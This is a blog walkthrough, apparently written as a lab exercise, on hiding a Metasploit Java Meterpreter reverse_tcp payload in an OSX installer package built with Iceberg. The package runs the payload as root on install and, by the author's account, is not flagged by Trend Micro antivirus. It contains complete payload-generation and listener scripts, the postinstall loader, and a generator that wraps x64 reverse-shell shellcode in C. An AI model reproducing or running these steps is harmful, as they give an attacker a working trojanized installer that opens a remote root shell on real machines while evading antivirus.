In the previous articles I was describing how to install and run 64bit OSX in KVM (in this example it is Mountain Lion 10.8.2), now lest focus on some simple exercise in creating an installer via Iceberg which would contain a meterpreter payload and will get executed once installed on the host. Also I have installed an antivirus for OSX. According to some online review there are a few products that boast high ratings, one of them being Trend Micro Titanium. Also note that I have no firewall setup on the OSX.
There is a previous article describing a very similar approach for an old 32bit 10.6.x OSX here : http://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit
In this test I have installed Trend Micro Titanium on OSX 10.8.2 and prepared an installer containing Java meterpreter payload. Here is a simple shell script to make things easier:
clear echo "************************************************************" echo " Automatic Java Meterpreter generator - FOR METASPLOIT " echo "************************************************************" echo -e "What IP are we gonna use ? \c" read IP echo -e "What Port Number are we gonna listen to? : \c" read port mkdir ShellCode ./msfpayload java/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R > test.jar mv test.jar ShellCode echo "test.jar generated in ShellCode folder..."
So next lets copy over the test.jar to the virtualized osx and load Iceberg. There is a video demonstration at the end that describes the whole process. Setting up Iceberg is very easy, just make sure you have the jar meterpreter file handy and the loader script which should be as follows:
#!/bin/sh /usr/bin/java -jar /Applications/Utilities/test.jar
I have chosen the application path /Applications/Utilities/ for the jar file to be installed in and a postupgrade or postinstall script that will load the test.jar file while the installer runs. Also While creating the Iceberg installer make sure that the “Requres Admin” is checked otherwise you wont get root privileges. Here are some screenshots :
Once you compile the project the installer located in /Users/user/Test (or whatever you have called the project) can be executed. Also I have created as simple shell script for the Metasploit listener for the shell:
#!/bin/bash clear echo "***************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo " For Automatic Teensy programming and deployment " echo "***************************************************************" echo -e "What Port Number are we gonna listen to? : \c" read port echo " starting the meterpreter listener.." ./msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST=$127.0.0.1 LPORT=$port E
So once we execute the pkg installer a root meterpreter shell pops up. Trend Micro Titanium seems to be happy with it.
So the Java meterpreter payload works well, how about native reverse tcp shell payloads for 64bit OSX ? They dont work as I believe there is some memory execute prevention in the kernel. I have tested it here with the following C source generator:
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload osx/x64/shell_reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x64/xor > test.c
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp.c
cat ready.c >> temp.c
echo ";" >> temp.c
echo "int main(void) { ((void (*)())micro)();" >> temp.c
echo "}" >> temp.c
mv temp.c final.c
echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4
cd ..
Once we copy over the final.c to OSX we can compile it via GCC and execute, but all I get is a bus error:
So we are pretty much stuck with the Java meterpreter payload for 64bit OSX systems.
Interesting Trend Micro Titanium processes on the OSX:
ps aux | grep Trend
user 280 0.4 1.3 713228 26736 ?? Ss 9:19AM 0:20.30 /Applications/TrendMicro.localized/iTIS.app/Contents/MacOS/iTIS -update
root 364 0.0 2.2 652028 45640 ?? Ss 9:20AM 0:21.90 /Library/Application Support/TrendMicro/TmccMac/iCoreService_av -p 61301 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmAntiMalware.dylib
user 196 0.0 0.5 690412 10752 ?? S 9:13AM 0:01.49 /Library/Application Support/TrendMicro/TmccMac/UIMgmt.app/Contents/MacOS/UIMgmt
root 62 0.0 0.2 617688 3472 ?? Ss 9:11AM 0:06.00 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61100 -n 61100 /Library/Application Support/TrendMicro/common/lib/libnamingService.dylib /Library/Application Support/TrendMicro/common/lib/libtaskManager.dylib /Library/Application Support/TrendMicro/common/lib/libnotificationService.dylib /Library/Application Support/TrendMicro/common/lib/libTmUpdate.dylib /Library/Application Support/TrendMicro/common/lib/libTmDb.dylib
root 61 0.0 0.2 617520 3912 ?? Ss 9:11AM 0:00.31 /Library/Application Support/TrendMicro/TmccMac/iCoreService_wp -p 61201 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmProxy.dylib
root 59 0.0 0.2 628928 4128 ?? Ss 9:11AM 0:00.65 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61401 -n 61100 /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/iTISPlugin
root 481 0.0 0.0 2433436 0 ?? R 9:41AM 0:00.00 grep Trend
And here is the whole process summary in a short video:
